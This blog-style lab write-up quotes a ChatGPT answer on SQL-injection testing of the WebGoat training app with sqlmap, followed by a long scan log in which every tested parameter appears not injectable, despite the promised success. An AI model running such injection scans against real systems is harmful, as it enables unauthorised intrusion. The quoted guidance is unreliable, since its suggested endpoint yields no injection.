Monday, May 12, 2025

[Research] Penetration testing WebGoat 2025.3 with sqlmap 1.9.2

2025-05-12

Using WebGoat as the target, explain the concrete steps of a successful penetration test with sqlmap?

ChatGPT said:

Below are the concrete steps for a successful SQL injection penetration test against WebGoat using sqlmap. This uses WebGoat 8.x (Java edition) as the example and targets the sample endpoints in the SQL Injection lesson module.

✅ Prerequisites

WebGoat is installed and the service is running

Default URL: http://localhost:8080/WebGoat

Author's note: in practice, http://192.168.128.145:8080/WebGoat

http://192.168.128.145:8080/WebGoat/login

Click "or register yourself as a new user" to create an account



sqlmap is installed

Installation (Kali Linux ships it by default): sudo apt install sqlmap

On Windows/macOS it can also be downloaded from the official site https://sqlmap.org.

Target test URL:

WebGoat's SQL Injection module usually exposes a URL, for example:

http://localhost:8080/WebGoat/SqlInjection/attack2?user_id=1

Author's note: in practice, http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjection.lesson


Obtained JSESSIONID=F3FA864D5426EF90B70752EE642E65C4


🧪 Penetration test steps (successfully retrieving data)

Step 1: Open WebGoat's SQL Injection module

Go to WebGoat: http://localhost:8080/WebGoat

Log in

Open "Injection Flaws" → "SQL Injection (advanced)"

http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjectionAdvanced.lesson

Look for GET or POST requests whose URL contains ?user_id= or a similar parameter

Step 2: Test that URL with sqlmap

Enter the following command in the terminal:

sqlmap -u "http://localhost:8080/WebGoat/SqlInjection/attack2?user_id=1" --batch --level=3 --risk=2 --dbs

Adjusted to the actual environment:

sqlmap -u "http://192.168.128.145:8080/WebGoat/SqlInjection/attack2?user_id=1" --batch --level=3 --risk=2 --dbs

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.128.145:8080/WebGoat/SqlInjection/attack2?user_id=1" --batch --level=3 --risk=2 --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:34:14 /2025-05-12/

[02:34:14] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.128.145:8080/WebGoat/login'. Do you want to follow? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=7D845A670DB...603487AD91'). Do you want to use those [Y/n] Y
[02:34:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:34:14] [INFO] testing if the target URL content is stable
[02:34:15] [WARNING] GET parameter 'user_id' does not appear to be dynamic
[02:34:15] [WARNING] heuristic (basic) test shows that GET parameter 'user_id' might not be injectable
[02:34:15] [INFO] testing for SQL injection on GET parameter 'user_id'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:34:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:34:16] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:34:16] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:34:16] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:16] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:34:16] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:34:16] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:16] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:16] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:34:17] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:17] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:34:17] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:34:17] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:34:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:34:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:34:17] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:34:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:34:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:34:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:34:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:34:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:34:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:19] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:34:19] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:20] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:34:20] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:34:20] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:34:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:34:20] [INFO] testing 'Oracle error-based - Parameter replace'
[02:34:20] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:34:20] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:34:20] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:34:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:34:20] [INFO] testing 'Generic inline queries'
[02:34:20] [INFO] testing 'MySQL inline queries'
[02:34:20] [INFO] testing 'PostgreSQL inline queries'
[02:34:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:34:20] [INFO] testing 'Oracle inline queries'
[02:34:20] [INFO] testing 'SQLite inline queries'
[02:34:20] [INFO] testing 'Firebird inline queries'
[02:34:20] [INFO] testing 'ClickHouse inline queries'
[02:34:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:34:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:34:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:34:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:34:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:34:21] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:34:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:34:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:34:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:34:21] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:34:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:34:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:34:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:34:22] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:34:22] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:34:22] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:34:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:34:23] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:34:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:34:23] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:34:23] [INFO] testing 'Oracle AND time-based blind'
[02:34:23] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:34:24] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:34:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:34:24] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:34:24] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:34:24] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:34:24] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:34:24] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:34:24] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[02:34:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:34:25] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:34:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:34:25] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:34:26] [WARNING] GET parameter 'user_id' does not seem to be injectable
[02:34:26] [WARNING] parameter 'User-Agent' does not appear to be dynamic
[02:34:26] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[02:34:26] [INFO] testing for SQL injection on parameter 'User-Agent'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:34:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:34:26] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:26] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:34:26] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:34:27] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:27] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:34:27] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:34:27] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:34:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:34:27] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:34:27] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:27] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:34:27] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:34:28] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:34:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:34:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:34:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:34:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:34:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:34:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:34:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:34:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:34:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:29] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:34:29] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:34:30] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:34:30] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:34:30] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:30] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:34:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:34:30] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:34:30] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:34:30] [INFO] testing 'Oracle error-based - Parameter replace'
[02:34:30] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:34:30] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:34:30] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:34:30] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:34:30] [INFO] testing 'Generic inline queries'
[02:34:30] [INFO] testing 'MySQL inline queries'
[02:34:30] [INFO] testing 'PostgreSQL inline queries'
[02:34:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:34:30] [INFO] testing 'Oracle inline queries'
[02:34:30] [INFO] testing 'SQLite inline queries'
[02:34:30] [INFO] testing 'Firebird inline queries'
[02:34:30] [INFO] testing 'ClickHouse inline queries'
[02:34:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:34:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:34:31] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:34:31] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:34:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:34:31] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:34:31] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:34:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:34:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:34:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:34:31] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:34:31] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:34:32] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:34:32] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:34:32] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:34:32] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:34:33] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:34:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:34:33] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:34:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:34:33] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:34:33] [INFO] testing 'Oracle AND time-based blind'
[02:34:33] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:34:34] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:34:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:34:34] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:34:34] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:34:34] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:34:34] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:34:34] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:34:34] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:34:35] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:34:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:34:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:34:36] [WARNING] parameter 'User-Agent' does not seem to be injectable
[02:34:36] [WARNING] parameter 'Referer' does not appear to be dynamic
[02:34:36] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[02:34:36] [INFO] testing for SQL injection on parameter 'Referer'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:34:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:34:36] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:34:36] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:34:37] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:37] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:34:37] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:34:37] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:34:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:34:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:34:37] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:34:37] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:34:37] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:34:37] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:34:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:34:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:34:38] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:34:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:34:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:34:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:34:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:34:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:34:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:34:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:34:39] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:34:39] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:34:39] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:34:40] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:34:40] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:34:40] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:34:40] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:34:40] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:34:40] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:34:40] [INFO] testing 'Oracle error-based - Parameter replace'
[02:34:40] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:34:40] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:34:40] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:34:40] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:34:40] [INFO] testing 'Generic inline queries'
[02:34:40] [INFO] testing 'MySQL inline queries'
[02:34:40] [INFO] testing 'PostgreSQL inline queries'
[02:34:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:34:40] [INFO] testing 'Oracle inline queries'
[02:34:40] [INFO] testing 'SQLite inline queries'
[02:34:40] [INFO] testing 'Firebird inline queries'
[02:34:40] [INFO] testing 'ClickHouse inline queries'
[02:34:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:34:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:34:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:34:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:34:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:34:41] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:34:41] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:34:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:34:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:34:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:34:41] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
